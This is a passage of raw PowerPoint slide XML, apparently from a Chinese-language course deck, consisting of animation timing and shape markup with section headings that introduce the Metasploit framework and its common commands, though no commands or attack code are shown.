                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
